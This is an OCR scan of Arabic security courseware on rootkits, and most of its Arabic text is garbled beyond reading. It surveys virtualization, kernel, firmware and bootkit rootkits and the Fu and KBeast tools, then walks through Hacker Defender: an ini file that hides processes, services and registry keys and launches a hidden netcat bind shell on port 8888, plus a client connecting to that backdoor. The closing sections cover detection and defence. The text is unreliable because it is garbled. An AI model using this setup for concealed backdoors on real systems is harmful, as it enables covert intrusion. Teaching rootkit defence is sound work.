<-W .W^ ^ J j^l j V™. 1 c> VMs Jl J Jc- t> J j>^31 j* L-^lVirtual Hardware Jl j Physical Jl 

virtualizationJ^ ^ 
: Hypervisor J 0* 

c±A liA VM Jl Wj^j^ u' l? 1 Motherboard ^1 ^jll! ^ ^ > j Native JjVl ^jil! - 
Native Hypervisor ^^l^ ^1 CjUJUJI 5JL»t ^ j .Liaji Hardware yr* ^ 

UltraSPARC Tl jlntel VT j AMD-V/Pacifica ^UJl^ 
VMWare J> Host OS cr^J^^ J^-^ ^Uij ^ ^13! Cs ^jJl j Hosted ^j^^ 

.Oracle Virtual Box J> j 

Virtualization strategies 

Hardware Jl j^U^ j^jjil ^Uaj ^> < at^s ^1 j U3U ^U^ki^JI Virtualization Jl c3j^ i> >l ^ 

<^^1 Hardware s j^Vl slSU^ ^ jib hypervisor ja j virtual machine emulation ^ cAfoj ^J^ 1 

^ <J>ilsiJJ 4JU ^liaall Jjt.uuII ^aUaj ^aA jJ gUCSt OS L^^^J VIM J^ ^ J^ 1 J^^-^l ^aUaj 1 g ^ iklu^J A-lLlkj ^^kU 

^IcILojI CjU^^L^a Jid Privilege Level c^-^ jft CjU^.^L^a3l J£ jja jl j& Aijjiall 6 1a J ^ c ^Jj ^aI j .^jiil^Hardware 

hypervisor Jl ^ jPrivileged CPU instructions 
Privileged CPU Jl j^A? hypervisor Jl V JjVl aLjUI paravirtualization ^ ^j^jj ^J^l 

VMc^ j 5Ui Jaxj <jl <^jl! J^i3l ^Uij l^a cilj^j aLjUI Hardware JJ ^ jL Vjinstructions 

. JjxJI ^iUxj ^jL 4^ Jjij^ali ^Uij jl ^Vl t>j OS-level virtualization ^ 4^31^1 ^Ljlail 

Virtual memory management 

Virtual Hardware Memory Jl physical Hardware Memory Jl J^j^ hypervisor Jl ^Uij ^1 ^> 
^ ajj^Ji Jji^ull a^j\ J£ jl Jj iaia virtualization Jl (joJ Virtual Memory Jl ^ik^ jli U£j 

multiprocessingJI ^ tsllij Virtual memory Jl ^l^i^U 
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Jl a! jjSj VM mL $ j^Vl c> VM I^^i^j Virtual Memory l£ Jjc- <^ hypervisor Jl <-tiUa j ^1 c> L^l 
virtual machine isolation-? ajLx1\ Jj^jll jaJ VM c^l gjWi .. n V ^Ij <u o-aLaJImemory space 

Virtual RootkitJi Sj^j 

^ Host Machine J J 1 ^ J^j VM Jl ^ J^ ^ ^ j yr* Virtual Rootkits Jl ^ ^ 

^ ^jUxJI ^ s Jaa. Jjlj Escaping from a virtual environment -St ^ Ca £ ^ jJ* 6 ^ ^ J jl 

. Jjia. jl$a> Jc (joulj VM J^ ^ lU*^ <^l ^ ^jj* ( < '' ^J (jl 

: Virtual RootkitsJI <> ^oij 3 
lJU^U ^jL <j| Ajiija SjUiall CjU^jJIj cjI^jj^ (j ^ * ^* y> j Virtualization-aware malware (VAM) j& JjVI f j^t 

4-iiIa j 4jJ ^ajl .^J^ t — ^^>*^1 CjLuj JJ^I Jla** £J SaJ > nj V <^5^ polymorphic Jl 4 J ^ > ^ajl > (j-a Jasu VM (Jl 

VM Jl J^ J**S JjiijaLill ^Uaj A a*\\ g a j c£^)^-l 

Jl VM Jl t> J^VI ( ykL^ ^ill ja j ^aa&II ^ j virtual machine-based rootkits (VMBR) ja J^j) f 

virtualization software*^ VM Jl J^j^ c> J*-aVl jU^I 
hypervisor J* ^aig-^ ?jk £j* j* j Hypervisor virtual machine (HVM) rootkits ja d^i^l p jjjt 

. llOStcs-^J^ J^xjuUSI ^aUaj j VM Jl Jc- ^ JjlijuaSlI ^aUaj <jL^al jUlbj JAsl* ja.L aJIAiLoj! j 

jjjL Qp, [jQst JJ Jj^jll 4_iLc flij host machine Jl Jl J^^jJl ^ j ^aVI ^Jl VM <J1 ^ Jl ULESI ^ 
Host Jl Jl Jj^JI c> ^£ ^jj^I ^ VM Jl l£ JJaxj jl service crash J^*j3 ^jjj exploit ^1 j*2 
host OS Jl j gust OS Jl J^l ^IjjS ComChannel -SI J^^l ^ VM Jl c3j^ f*' c> .machine 

Hijacking the Hypervisor-? ^ ^ ^ c3^j^ Hypervisor Jl * jW^l ^ Host Machine Jl Jl J j^ 3 Jl ^xj 
jl VM <^lj^ f^l J^ s J^l ^jViinn JUJUj Virtualization ^ hypervisor Jl ^ ^ ^jJI ^j K:^ 

HostVM 

jA Virtual Rootkits Jl jfr^ (> 
. Michigan<~^ J ^ e 5 Samuel T. King and Peter M. j^SubVirt 
. AMD-V^^J u^ ' ^^ j Joanna Rutkowska <^ jdSlue Pill 
. Intel VT^^J (j ^ i ^rt Dino Dai Zovi <^ j^Vitriol 
Kernel-Level Rootkit 

L-Ixj. ^aJj J^ll Jc AJJ^S j Kemel Jl jA j ^Uaill Si jj L-l^ .^j <jV jixkVI ^ jill li^ . JdT-uull ^Uaj ^ ja. JjjjSII/S! jill 

backdoors ^j^^^j I^a j .AiUiu£l ^ ^5^. Jjj^l ^L^aaV ^ j^j Jjjlaj Jl ^ll^jj Aj^Jiiill ^1 ^JU <aUiu£l 

tdli ^jjj <!AsLxi ^1 j£l ^ JjjjaJl/ol jill J j£ ^13^1 J^ \""^ (jj Ja (jc jl AjaLjal A-ia ^j; Clal <uLlj 4Aj& J^la. ^j-d AjLouI ^jjj jj jJi^ll 

jl£ lili -L >Aii3 J (loadable kernel module) sljjll sl^j jl Windows J (device driver) sj^Vl J^j ^Ijj 
^jl^ J^ Rootkits J^ c> ^ Jj ^Uiill jIjSLajI J^ jjjj cJj^ liA 'Rootkits >j J bugs jl LLa. ^1 cilUA 

Application-level Rootkit 4- 

jjjL jc. ji Rootkits Jl^l Ja c> Aja^aS I jjj^a jl^a. Ja.b J^xj Application-level rootkit 

.^1 ' injected code < patches <JlaJI c^llnkill Jj^i 
Hardware/Firmware Rootkit *k 

s jj^ <^l^V (devices or platform firmware) * j^Vl cjL^ J s j^Vl ^^ki^j Hardware/firmware rootkits 
firmware J J^ Rootkits .<^JI 4iUaj jl <BIOS j ^ jS > ^ I ^jall Ji« a j^Vl J (malware image) 
.rootkit malware c> J^ c# Firmware rootkit .firmware ^IjSI ^ 
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Boot-loader-level Rootkit (Bootkit) ± 

. ^Ijj (boot loader) ^^Vl ji Jl^>l CxJ* Ul lU^ Boot-loader-level Rootkit (Bootkit) 

1$jV <>Vl (jlc s cjI^iu^I ^ Boot-loader-level Rootkit (Bootkit) «^ .Jj*j&1I fUa3 J^-^ 

Library-level Rootkits 

system calls lU* lU^ ji ^Uk^l t ^ » ^n ^ s^lc j Jji^all ^Uaj ^ ^1 ^ ji^ ^ J**j Library-level rootkits 
j/<9j^ ^ j^l e^lj c ^l^aVI system calls Jl^>l ^ .f^W 4_Jj<^ backdoor ^ 



cjjj]) uL£ How Rootkits Work 

t> (pointer) j^j* (original function pointer) y?^^ J^> Jl^>l j <^ System hooking 

. (stealth mode)^^ <j^j y^ rootkits 

core system DLLs J^b '^^j i> rootkits yr* Inline function hooking 

.rootkits *\*»&*\ ij ^ul*^ t^jj 6 (kernel32.dll and ntdll. dll) 




Process (Before Hooking) 



Hooks 



■ 



Code section ... 
Call FindNext File 



imp-art data seeder 
FirtdNexiFile: 0*57654321 



Kemel 32. di I 

0x87654321 :Findh«rt File code 




Process (After Hooking) 



Code section ... 
Call FndNextFile 



Import data section 
FlMftJextFll?: QXB7654321 



lfernel3Adil 

ChE76S432i:F i n d N e k tF i le ■ 



Ftottkit code: 

0*30045123: MyF rid Newt File 




Root k ft replaces first 5 
bytes of code with 
Jmp 

0x90045123 



e U^I CjUL^ c> yr* Direct Kernel Object Manipulation (DKOM) rootkits 

jjij tiaUJIj CjUUxJI plikj LjaJ liAj .Ljajl tSlli (Patch) gj^ > kernel * jSli JSUa yi s^j^jJI (System process) 
tJjixjoLill ^Uaj * lajuiiSI CjUIaslSI ^LajIs ^£ c_jc!>Ij3I (jj^la (jc 4 1£ uj o ^1 ^jjj Windows event viewer ^^-^ cJ^ 1 ^ ^cjI jLildVI 
g. jjII t> Jjh^jI! * j^3! <uJ . (PROCESS IDENTIFIERS structures)*^! ^ j~ l£U J^b CjULJI j 
. (Device\Physical Memory object) SjSlill/jl^aJI (read/write access) *ij£ll/s*ljSll 
.CjUUsJI ixjlS ^> l^jlLkl/U j£i ci^J^ ^J^Jl ^ jSj DKOM rootkits 









Process 1 






Unique process ID 
















ActlveProcesUnks 








LIST ENTRV { 








*FLI N K 








"DUMJK f 















Process 2 

Unique process ID 



Process 3 



UST f\-= • ! 



"FUNK 



'BUNK ) 



IJl I i II " fJIIJ r- ID 



ActlveProceiUnKs 



LIST ENTRV { 



*FUMK 



- »BLIMK } 



Proi Ikli -' i itii^rs ] 
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Rootkit: Fu 



t> <#^ J Direct Kernel Object Manipulation (DKOM) ^l^i^U lU^ infection database Fu 

(kernel object) Jjj^t J <-)^ The Fu rootkit. the driver (msdirectx.sys) jthe dropper (fu.exe) ^UjUl 
^i* ^^kioiJI -L paxJI ^^ a x j Jajj jj (kernel process objects) <J^ CjUjIS .^Ikill J CjUUxJI JIaj ^illj 

djl^jlll £-ixLaJ jjijjj (JjiiJiill ^Uaj i APIlD^- ^j^*^ ^liJiill ^Uaj ^ c . illaj ^ill j TaskMgr.exe aJ-^c 

iajl jjll ^-i^ ^UJU ^jIj ^ill j d£ dj jjll jj^ .<jjojLl<JI diLa jIslxJIj j^su <Lajli3l (process objects) c^Ul**^ <j^aLkH 

m 4A*c* Aa. jii V l-u^ 4L— aVqjjW^I ^ ^j^slSI ttillil .l^jlLk] jjjj ^ill cjI-AatJU (unlinked) ^l^alall 

Liajl tii^oj _<ilik-<JI Hooking ciiLuaj ^hvimU (drivers) lS^*-*^ ^j^M ^jjuj j ^ILkl U-^jI Rootkit! Fu 
Lgjl£ j^ij the Windows event viewer J W j^V t> ^ .cjLL*J! cj! jln*VI ^1 AiUbj 



Fu operates using 
direct Kernel object 
manipulation 

Com ponents of Fu are 
dropper (fu.exe) and 
driver (rnsdirectx.sys} 




Invite de commandcs 



■Proces 

Prnr r ■ 
ro cez 



y 



Proces 
roces 
otal 



p>fu pi 38 

is = 215311912 

s - Systen:4 

; : snss -exe :37f» 

csrss .exe ^632 
t~ win logon = 
e: services 
a: Is ass -ore - 732 
b: swc host .exe :9 
s : svc ho . exc - 1 

svchost ,»xe:l 
11 avchost .exe :1 
ll suchost .exe :1 

spoo Iesv . exe : 1 
> : IPHwAreSe rv ice 
s: Alg.exe:203& 

explorer .exe : 
si uscnt f y . exe : 5 
; * y Hw e I ray .ex 
a: UHw Are User. ex 
|l etf p*on .exe s 11 

end* exe: 429 
II t askngr .exe :B 
litriber of |)roces 



12 

MU4 

092 

176 

284 

41b 

■ e = iS92 

572 
80 

68 



It allows attackerto: 

* Hide processes and drivers 

« Hide Information from 
user- mode applications 
and even from kemel- 
rnode modules 

Add privileges to any 
process token 



Remove to-be- hidden 
entries from two linked lists 
with symbolic names 




Rootkit: KBeast 

cjIjI^I .(kernel module) Jo£ ^ ls'^j kernel rootkit KBeast (Kernel Beast) 

^l^ki^U .userland component ^l^i^U axj ^ Jj^jll jajj .2.6.35 ,2.6.32 ,2.6.18 ,2.6.16 Jjj^t 

^ .c5 j^V^ userland Cjllnkil 4_^u3U jjc. userland backdoor component clA^ J^O ^ ^ -5 



JjS ^ <a ^>sla3I ^31 ^ l^ii ^31 (ps 5 pstree, top, lsof) j tCjI^JI j tCjULJI ^ILk] 



J^U ^> ftkdl Jl Jj^ajll J^ KBeast 'userland J netstat .^^ki^JI JalislV Keylogging 

.CjIjUtII J^Uaj ^Uaill cjUIc^IujI (hocking) ^j^- ^1 

?l l^a userland LLd^kiajl Uj| 

-( jjc jill J-dJii jll cjlluSall) c>asu J ^jl j userland ^^-^ ^ I^a j 
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<-fcj£^ cjI^j *lLkb ^ jL Hiding this loadable kernel module 
cjI^JI j CjULJ! *U^L ^ JL Hiding files/directory 
.djUUxJI *lLkb fJL Hiding process (ps, pstree, top, lsof) 
.cjVU^jVIj fjL Hiding socket and connections (netstat, lsof) 

.u ^vim^ l 3Ja^l ^jjILJ! CjUj^ Keystroke logging to capture user activity 

.s jilU Cjllnkill jit ^ Anti-kill process 
.SjSlL cjULJI cJi^ ^lJ Anti-remove file 
.s jilU Jj cjI^ j lJI^ ^i* Anti-delete this loadable kernel modules 

Local root escalation backdoor - 
m c£ cjjjII ^LkJjj UlJI backdoor s-> CP JI^jVI Remote binding backdoor hidden by the kernel rootkit 

Hacker Defender: It is Not What You Think 

Hacker Defender l u^lal ! ^ ^UJ3 c^J Igi .rootkit j*> Hacker Defender «4w^j ^Yl Y uUjfiVl Jjl 
^j** ciljl liAj Cjjj Jj^jjj Hacker Defender .^Ylj ^iV tn^j ^ ^Ij jj^jlU o- 3 ^ rootkit 
c> 'Hacker Defender c> J j » ^N ^ jSjYI ^ diaJI L-^l ^H^i <-ij^ . Jj^j jl^ ^ U jiu ^H^i 

! (malware program) 4ii±k]| j^j cJ^j^ ^ I jSSi uj^ >&yA\ 

'hxdeflOO.ini 'hxdeflOO.exe uj^ c$ ^ Hacker Defender ^ j CjUL 43513 ^Ua 

.ftiA djliLJI ^^ic LLgUuaI j^jioj i^j j^-YI ciAiLJI ^ ^j^xJI ^ a - biL > u _Ja j» - ^ < aL&li ^ji ^ ^c-j3l .bdclilOO.exej 
^Yl y> HxdeflOO.ini .lJ^IuuJI ji^J! ^ Hacker Defender j^j g?^ ¥^ J^l j* HxdeflOO.exe 
BdclilOO.exe .^^j C5-^ djl^^Jl jl cjUIaII jl ^1 jJI 4_*jta j Ig^hviml ^jjj c _^j3I cjIjL^JI aS^lL ^ 

.Hacker Defender m backdoor Sj^U^ JL^j^U ^^i^ ^^ji 
jSs <iajjaij ^UjV iai^jall tSla £-tl^ t*Lli ttiL (j-aUJl cJ^JI hxdeflOO.zip <■ aLll Jj^^l <ja pl^VI ^j^aj 
.(partition C) jj^j Jj* > (a^j lU^j ls^ u^j^^ o-^lj^VI j *Lij| JjjaaVI tjlS-aVI 

tSli g-i Uj CjULJI AilS ^ .(for rootkit) "rk" ^^(C:\) ^ ^ ^ fj£ 6 J^ 31 ^ ^ 
cjIj^I (J ; ia^j] ^ j^j^ ^ j^j (J^jojVI Ja^jjuj 11a . ila a]1 11a <Ja ^stjjax» j^* 3 ^ <jLjjl^ a j hxdeflOO.zip 

^l^c] ^ iajj (jl ^hxdeflOO t > ^> tda ^I^jjVI ^j^ajj . cJ^^ iS^^y^^ ^ jlm^ll 11a ^.ILkl J*^j t^jaLjal 

.hxdeflOO.ini c> Hacker Defender 

L_flLJ JUL* <J£joJI (j^jj c-H (3^° f c^^J .Aill^xJI ^LaaSVI '.ini ^ kLoJt ^ia ^^^aj 

: C5 ^I j^aVI ^I^VI/ojj^I 



Via 



xdef* 

[ Hi ci^Jeri r*r- o^-e s s e&] 
^ cmd . exe 
[Root; Pro-cesses] 
rcmd, 

[Hidden -ser v i: <z e s. ] 
HackerDefender" 

CHicSeien ^q^ys] 
hl^ckerDeferiderlOO 
l_ EG*CY_HACKERO EFE WOE R3- OO 

Hack er offender or vioo 



Screenshot of the hixcieTTOO.ini configuration file. 
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{hidden process) 4ji»JI dLU*JI] <[ {hidden table)^^ Jj^'] ^ J ^ ou^' t> «<jJ-»^ JUdl j* jjjj* U£ 

Hacker ul£> jl i^^l^ .^j^j <[ {hidden services)*?*^ dU^ikJI] <[ {root process) dLL^] <[ 
J duL jli j Hacker Defender dUL dVU^Vl ^ ^vimi .^jjai jjiVI dVU^VI j* j j j ^^j Defender 
wildcards ^l^kiajl ini L -S^V .AjaUial dljuij* ^Ij^.] ji lS^-^*^ o-^ ^ backdoor 

ajj > o hxdef c — * '^£3 c 6<JL^JI J ."*" l-aj^JI 

dULJI j* .[ {hidden table)^^^ J j^'] J j^' u' lU^j . jjjU*JI <-£ l>* l£ * j^JI o* ^j'^ ^j^ 3 
(file manager) dial*] I jj.j-gj (explorer) t aju^Iu^I j* a uj^ * ^ j^-M J ^-j-^ cjI^I^JI jl dl jLa^JI jl 
Jc pLl _Ua j>* ^SIj t^Loj dS j J ^ jiial LftS j-aljSVI ^j*** Jc- * ^Uijlj dLaa lij .Windows ci^ ^ ^ ^"^^ 
.[ {hidden table) J^ J j^JI] <^LJI J " r k" jrl J J k f ^oi t JjLJI Jliall J ajL&L U*a ^ill ^kxll 

jo SlrLxi jj£j* jl ^jjj Jl) jJt jl CjUIaxJI J£ 4-Ajta j jjaij ^ jSj jjoj t[ {hidden process) 4j**JI dLLuJt] ^JaLJI J 

dLa^-xJl JJ.J-G (Jj»-^>jll CjUIaslSI jlajC .JJC J^xJl ^^JjoiaII jc Ajfla a jj^J <*-A jjuj IjA Sjj^AaII CjUIaslSI j-a (J£ ^ IsLLol^I 

^JaixJI diaj <jjojLaJI ^xiljjj ^jjuoI ^ll^j ^juj caJL^JI J .<jjujLaJI aJVI ^Ujj e-likl ^jjj tiljl jiajjaj & JHa£ .(task manager) 
uj^ (* ^""i^ t o\* '[ {hidden process) cjUUxJI] ^JaLJI calc.exe 4il^L> .[ {hidden process) ^^J> cjUUxJI] 
. jj jjux^H Jc Sjfl jla <jjojL^. ^Ijjj ^1 ^.jj jlfl tUj^l rootkit ^j^^ .4 jml^ti <JV1 ^Ujj ^ Jclijl! jl jjiisJl Jc Ij^lS 



J <j| j^ij* .ILLuj 4 jq^ ^^1 CjUIxxH j CjI^I^JI jiajc j JclijU ^ m a ^c^IjJ ^Uugill t[ {root process) j-^?^ CjUIxc] ^.u>a3l 

.[ {hidden process) dUL^l] j [ {hidden table) Jj^] J ^J^J 31 ^ ^ 

'backdoor tA£jJo3l ^\ jL tdjULJI JSj Jj^jj jjj l!^ dUi^kJI cJ^*-^ jl ^•^^ l_ ujjjII l^iLuj jll ^1 jJI tiLJ jl£ til 
djU^kjl] fjoil! jli jkl ^LaaaVI l£ .[ {hidden services) 6 ^^ djU^kJI] ^oill J j^j Jj ^ j^i ttilli Jj U j 
^<»ljjJI j-<i ^1 s-likl ^jj i o ; (task manger)^ ^ a & ^ i^e\jul\ aao ;^jkl /ojj^axJI cjUj^J! J£ ^^^1^ [ajI^xJI 

Ak. Jj^oull ^jjIL. *Ujj jj 2-1^ Ujij .41*^ (REGKEY) J^=^ ^U^V [Hidden REGKEYS] ^l^^l tSl^ 
Jj ^H^j ^jjojj .^jliJI J£ ^U^V l^l^klajl jl^j [Hidden REGKEYS] . jj jjj^II jl^j> J^ l ^U *n jl I^jjS jj 

,<il3i J 4 ujj Jfl ^Uajll (Jjjjabd jli t( J^xi jl) A j^ixi ^-UixJI jl£ lij _4_L^Ij ^JjILq ^li^.j ^J^ j-a JJ^l ojlajjoj ( . illaJJ CjVI^JI J^asu 

^jill ^ILkU ^jij c_flj^ liA j [Hidden RegValues] ^l^i^U U3 ^c^j Hacker Defender ^VUJI ^ ^ J^Uii] 

.<L£U ^ULJl jx V^j Aj^jall 

^jj UIS^ jj£^> tiA j .Hacker Defender ^ ^j^? ^ ^ J 3 ^ s^'j^' J* [Startup Run] 

. (Listener mode)t*^^ J j* ^ ^ .backdoor du£ jl Netcat j*Vl 

( ■ illaJJ L_fl^Jl jl^-aJ) Jc ^txil Jjll L_Jj£jJ t^ajill j Jj^joljll ^JjILq ^lAjlj UjUIj ^ jflj* j]| j jj,jjjj Jc ^LXil Jjll LljJJJJ (J!Lq LdLdJ 

lij „ j^ajUl 4^1 >>i^ j>i JJJ^Jl < ; illaJJ ^dljjJ djJJJJ C-LoS lij ia^.!>lj jl ^ j£ aJ ^Jalill (Jjjjaixi t^jkl 6j-d LiA .( -jL ^ll j^ajal! Jc ^.Lma 
;1^x»I^JjujI ^aJ SLai L-jL ^ll j^ajUl 4^.Lai>i ( ftj^aJ jx» jj£! jl L_Lujj£jj ^aUVI ^L^a J 4j j^aLkll jj jJJx^ll jl^A. l^JJ ^^JjouJI jl£ 

<^.Loia3I <j-<^ " jkl 6j>» AiLiaj " Jj jj* jjj^ll [Free Space] ^aLall laJL^I cjI^jJJI j^a*j jjjj 11a jli 

^SjSl Jj AiLjaVU Ajlxilt 6 jfl jl<Jl 6 jaJ! A^LouJl jc^ ^^Vb JJ j^^Jl J^ jiajflj L_fl jjoj LiA ^3j cJ^-^j ^— ,l^l<i^Jjaj| ^aJ jli ^^J^ 
c flJjJaJ jl i. . la>J tiljli 66j^Jl 4aL.ha11 j-d CljjUUtJC. 1 t . illaJJ ^xiljjj djJJJJ duS lij 4^5 jkl SjUau .^joakll lifc J <!L^.^Ij L_ Lq3 ^5^31 

lij .djb s jj^ J fSjJ! liA ^ ^jj jl ^ jj .cJiUj^V! JUi^l t> cJlL tSUijj .[Free Space] ^ J 1073741824 

S lia \\ 4_jjujLaJl dVVI j-Q AjAslSI tillj^a 'djU Lsu-o djU Isljc. Jj djU jli£ Jj djU j-a 4-^.L.>la]| Jjj^j J dAcLoi^ Jj 4-^l^*J du£ 

" djUUj^ Jj djU jLS <jjojU. " ^JaLudjj .djjjjVI Jc^ <j^H<JI 
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J) Uiajl ^Mi'qn ^jaill 11a (jl ia^^jjaj .[Hidden Ports] ^^^1 1^1 j^j <qj tl^jiil kJa^j c ^j3I ialL<JI lij 
^1 (Inbound Ports) fcjljl! iiU-JI ^ ^ ^ ^ jk ^ ":TCPI" .UDPj <TCPO TCPI ^VU^yi 
Jjjoij ^ill jlS^SI 11a ":TCPO" .^l^ala 1 ^ jjj J>^qj <LLauj tliA l^Ja j Ajjj &^*j*1« ialia c*L^ .^V^^l l^jlia.) 

.UjlLkl ^jjj ^ill UDP iaU* >^ ":UDP" II cjc ^LjM - uj^ Au 2 Sj^JI TCP 

^ jij l_a jjuj t JtU! I^J .J-**-^ ^ staVI (j-^a^ij U jc^ ;4jjujLujV1 Hacker Defender ^tal-^c-j cImj^ Of* ^f^' 
Netcat c> ."rk" cf^'j C:\ lSjM' u-aljSVl ^ Hacker Defender 





F&r. Ed* Fori- 1, A* Vtew H#4p 


[ -li cC*C-n 5 j "! ] 
h - :;C:1= " 




Cm i dden Pro cesses] 
tlxdef ^ 
r^md. axe 
n-c . &jta 




[ftoon: Processes] 

fixntef 1 " 

^■crmd. exe 




[Hidden Services] 
H-a-cfc er Defender 




[Hidden ftegifeys} 
Hack er CiefenderlOO 
LE&ACY_HACKEfi &EFENDEK1&0 

H^ckfir Defender or vioo 

LEGAC r_HACK£ RDEF ENDEft &RVIOO 




[Hliclden ftegvdlues] 




[St: -am up ft-ym] 

c :\irkXri!cailinrt\nc„ exe — L -p SS=€ 


PS — «t c : \*1 ndows \* yst em3 5 Xcmd, ckg| 



Newly configured hxdeflOO.ini file. 

^ UIUj ^^13 Netcat ^] 'I j^i j '[Hidden Process] Netcat ^^11 ^ j '[Hidden Table] gJaLJI 

AiLjaj J^Lk ^ ^lli ^j^dj tplilkVI ^j£U3 AjaLjal <Lia AiLjaj dj^jl lil .c-i^J) ^ 8888 cmd ^j^ 3 j^j 

[Hidden Ports] 8888 

Netcat (nc.exe) ^j^tj "rk" ^» c> ^ l)1 ^ -hacker Defender f ^ cjILSUI <> j& J14« 



I EEC 




em it: 

EEfi-K Dwskixvi... 



CO 
[■5 

SB 




CtfrK 

■6S t Hcit Fyoc.. 

"S^E W w w; T I 

?,*J^«; irti i ■il... 
TO* 

rtilTinrnir 



Oa ^1 <^tf]| JliJI ^ajj SjSJI jfuaj Rootkits l)^ 'hxdeflOO.exe <-&^ ^/J^u jj^j 

a i^li oaI3 Aj^ulUL < jjjjj^j jjp I^ju^I "nc.exe" g-^^j^t j "rk" 
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"j j Open CnciLKSa H^dry » 





U>-:-" fi» 


M E <Au I 












QQ 








COfV>O*t.*0CH 




OC 


SS2K 








&EU 


W 


se+K 










00 












00 


216 K 


D*f*fc4p ... 






D3U 


Dd 


Z-Z .9 DJL K 








CrSU- 


OS 


-1 I 


jMtmj ... 






D3J 


<w 


1 EO K 


j^*:T»i ... 




notepad .eaua 


MU 


DO 


7% K 






r^--iSjC -■<■ 


D5U- 


00 








r^.-K>:r r.T 


Q3U 


<W 


B3& K 
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CPU Ltsftpfl : [y* 



t^'j t yr* Rootkits .dULJI ^ UU3 d jiS Hacker Defender Rootkits Ja*J j>M 'djjt ^ 
.<Lasl!I j^aiuj j malware rabbit hole ^ ^ > *j j tdU^LuiVI <Jasu 



Hacker Defender fhxdef) is a rootkit 
for Microsoft Windows operating 
systems 

It enables processes, files, and 
registry keys to be hidden from 
system s a dm in istrations and 
security scanning tools 

It can enable remote control of a 
computer without opening a new 
TCP or UDP port via a covert 
channel 



Command Prompt 



u & 




^^^^^B bdc lil00.exe 192.168,3.93 
135 V4L 

cannecting server . * ■ 
receiving baimei . + 
opening backdoor . . 
bdckdwx found 
checking backdoor 
backdoor ready- 

authorization sent, Waiting jfor reply 

authorization - successful 

backdoor activated! 

close shell and all progz to end 
session 



i 



Detecting Rootkits 

'cross-view-based 'integrity 'heuristic 'signature ^VIS d£ d jJ\ jo l_L2S1I < Vu^ 

.Runtime Execution Path Profilingj 
Signature-based Detection 

<jjlL» L_flLa (j* dulj (JjoiLjjJ 4ijtLa (Jj^ia (jc tillij ^^^^ djj^)3l A Aj^aJ l^jl£j (Jasu Signature ^5-^ ^J^^ L_Lai^3l <L^)Ia 

Cj jjll .^Uaill CjliLd ^^ic ( . ilUJl ^ l_j jLojVI I^a ^>iklujj , (malware prograni)^— 1 ^" 2^^^ c^"^ L_aLJ duU J.>.>1>.>ij ^ 
Signature ^-Uj o-^ja .kernel SjSti ^ ci^j^ 3 ^ j^-^ ^^11 o^jj uj^ ^ 

> ftjuj^ll ^1 Jill ^fljjll jLaa-d 2^ (J^^A 3 diliLJl ^ILkV d£ dijjll J;1a3 I jJaj <L1S 

Heuristic Detection 

l^^su c flj^^Jt ^ jill I1a .djU£ jLaJI jl aj^IslSI (Jjxj^jII ^Uaj iaLftjl ^ cijlil^pJVl ^j-^j l^^A 3 Cf 0 cJ-^ Heuristic detection 
a! j^JI t^^JI ci£ cj jjll ^j^j ^ jjlS Heuristic detection . (behavioral detection)^£ Cf- U^l 
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path hooking \:° v; J\ Jjt_uu3I ^Uaj .LL^I Cjlal j^jVI C5 1c- l-ajxjII Ij^ta ^ ^j^l Sj^l £>i& .tLLai 

.d£ dj jjll jj^il heuristic p&&\ < cs^ll j ^ ^ *^V( 

Integrity-based Detection 
qa 6 jj^i jl t (boot record)*V&^ cS^^ j ^JUJI ^tkdl CjUL jjj <j jlLJI Integrity-based detection <^ j 
c^^likVl o' clA^ -^-^ ^ j cs-^* ^^Vl j^*-* j l3j^ j -0 j (base-line) ^^Luil Sj^lill 

Cross-view-based Detection JU 

f j^j 1^ ,<jjj^l t> ^j^ 5 ^ & lS^-^JI ^Uaj jl ^1 jjal ^ Cross-view-based detection j 

CAjLJl <C a lg» <^ ^aJ ^^jll CjLg jIslxJI <ijLLa ^aJJ ^aJ .APIS C-^^^l ^J^Ja (jC (Jj^ > ulll ^Jjli-a j lIjUIaslSI j ^aUaill ClAiLa jlAxJJ 

j] Hooking API ^ cs-^ ^/^^ 6 ^ a^Ixj .CjULJI (jj^ <J^-^ *S^Oj^ ^ ^ J^-^ <J j> ^ <^i^ 

.hook manipulation J DKOM c> ^ 

Runtime Execution Path Profiling ± 
^Ikjll cjUL^ Runtime Execution Path Profiling u£ uj^ Runtime Execution Path Profiling 

. ^jj^jj (hooked) Ia^LiLj^I ^jj (j;!*^ (jjj j^l -^hj ci^ s^fliJI 

Steps For Detecting Rootkits ^ ^jjit <-iLiu£V cj(jkaJ) 

http://research.microsoft.com/ 

dir /s /b /ah 
dir /s /b /a-h 

Jii^ ^5 <JU3| jVI J ^fc j ^ jij ^(Boot into a clean CD) j^c. J^-^ jia^l J^Lk ^Uaill J^-^j -2 

dir /s /b /ah 
dir /s /b /a-h 

CjliLJI c fll /oi^V ^jjjjjl uJi qjj jin^ll ^cjllj ^^Jc CD lS^-^ jiajoal j!^. WinDiff el) -0 j^ 1 ^ 3 ^ l!^*-^ ^ -3 



jj^I 4iUaj tBIOS ls* ci^l stealth software CP < - ii % ^ ^ .4jil^) gJUU! ^ l)J% rf 6^ :4iajal4 

.g« ,cjUUU 4±i±1\ Jjl^aJlj . (bad disk sector)^ u^J^I ^UaS ^EEPROM 
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Defending Against Rootkits 

JjVl 6 J^*^ <jl£ jUlbj ,L_fl^Jl ^Uaill Jj c^J^Vl (J jft L . lllaJJ tdl£ dj^)3l L—UiJJj (jJj^J (j-a Ail ^gij ^j! ~* all (J-g 

dj^)3l ( . llaj J J jVl 6 jjn^ll jUlLj _4AuiS (J^joiJj 1 j^l > (jj^J (jLi^VI (j-a J J ^ ^ J) C£^J^ r* J>(3^ 

<J jjjouJI (jjSa. ^ixjaull ^lq^jLolaI] l^ja ^ajou Jll die jjjouJI ^j-o 1^. <JJa c*1Ua .{jj^ ^Vim^N <jjudi3lj CjU^^L^all 

run as " J " su " dl jU-aVI Je %ySl\ aI^JI Jji A>Jaj| jajj jVI tSBil .lW^ 

."administrator 

JJ^^. J d j^)3l (J^asu ^A-iA^Vl ^a jJl ^J^J Jj ^ J^ Aj^^xi £laU^)j3I JaA^ j ^1,^1 ml j L_li£jJ <jl£ tillil tdLoj JJ^I 

.AjaI^JI djLoj jj^ll ci^ J c aju^li l^*j JaVI j 3 <uv^l dit jt.i^yi 

jj^al! ^^>^ ^-^^) c ' J , ^ a ^ UJ^fl A UJ-^ JJ jaU ^^ el) -0 .A£jjuo3I ^ j^kJl j Jl *La^la3l JJ^JI ^^>^ ^-^^>^ ^ > ^jl ^a£-all (j-a 

^j^kJl AjL ^jC Ai^>*>J !>b^ia IjSj ^3^>ijjaaJ /ojLjall 

